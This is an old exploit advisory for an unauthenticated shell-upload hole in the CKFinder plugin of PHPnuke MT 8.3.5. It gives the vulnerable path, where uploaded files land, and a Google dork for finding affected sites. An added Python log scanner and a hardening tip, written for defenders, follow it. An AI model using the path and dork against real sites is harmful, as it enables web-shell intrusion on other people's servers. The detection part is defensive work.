PHPnuke MT 8.3.5 ckfinder Shell Upload

2011.07.01
Credit: Net.Edit0r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: PHPnuke MT 8.3.5 ckfinder Plugin Arbitrary File upload Vulnerability
# Date: 2011 06 27 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://www.phpnuke.ir/
# Version : 8.3.5
# Tested on: ubuntu 11.04 ~ Centos
# CVE : -
---------------------------------------------------------------------------
PHPnuke MT 8.3 ckfinder Plugin Arbitrary File upload Vulnerability => RFU
---------------------------------------------------------------------------
Author : Net.Edit0r
Date: 2011 06 27
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /includes/ckfinder/ckfinder.html le.php
~ [PoC] ~: Http://[victim]/path-to-nuke//includes/ckfinder/ckfinder.html
[ Upload To : /includes/ckfinder/files/Filename ]

Dork:
~~~~~
Google : inurl:"PHP-Nuke Project By PHPNuke.ir"

Video Demo:
~~~~~
http://net-edit0r.persiangig.com/nuke.rar

Timeline:
~~~~~~~~~
- 24 - 06 - 2011 bug found.
- 27 - 06 - 2011 vendor contacted, but no response.
- 27 - 06 - 2011 Advisories release.

Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
---------------------------------------------------------------------------
Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | and all bhg member
Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.boy | Mikili | +_AttAcK_+ And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ----------------------------------
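For defenders, an added detection example (not part of the original advisory) that scans web access logs for the two paths the advisory names: requests to the CKFinder UI page and script files served from the upload directory. The Apache combined log format, the extension list, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory; everything else below is an assumption.
CKFINDER_UI = "/includes/ckfinder/ckfinder.html"
UPLOAD_DIR = "/includes/ckfinder/files/"
# Extensions commonly mapped to the PHP handler (assumed list; adjust per server).
# Also matches double extensions such as "name.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Combined Log Format: ip - user [time] "METHOD target proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, reason, path) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, status = m.groups()
    # Drop the query string, decode percent-encoding, collapse "//" runs.
    path = re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]))
    low = path.lower()
    if low.endswith(CKFINDER_UI):
        return (ip, "ckfinder-ui-access", path)
    idx = low.find(UPLOAD_DIR)
    if idx != -1:
        name = low[idx + len(UPLOAD_DIR):]
        # A 2xx response means the server actually served the script-like file.
        if SCRIPT_EXT.search(name) and status.startswith("2"):
            return (ip, "script-served-from-upload-dir", path)
    return None

def scan(lines):
    """Classify every log line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '198.51.100.7 - - [27/Jun/2011:10:00:01 +0000] "GET /nuke//includes/ckfinder/ckfinder.html HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [27/Jun/2011:10:00:40 +0000] "GET /nuke/includes/ckfinder/files/x%2Ephp?c=1 HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.9 - - [27/Jun/2011:10:02:00 +0000] "GET /nuke/includes/ckfinder/files/logo.png HTTP/1.1" 200 9000 "-" "-"',
    '203.0.113.9 - - [27/Jun/2011:10:03:00 +0000] "GET /nuke/includes/ckfinder/files/a.php.jpg HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, reason, path in scan(SAMPLE):
        print(ip, reason, path)
```

A hit on the upload directory with a 2xx status warrants checking that directory on disk; blocking script execution under `/includes/ckfinder/files/` in the web server configuration removes the impact of an uploaded file.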

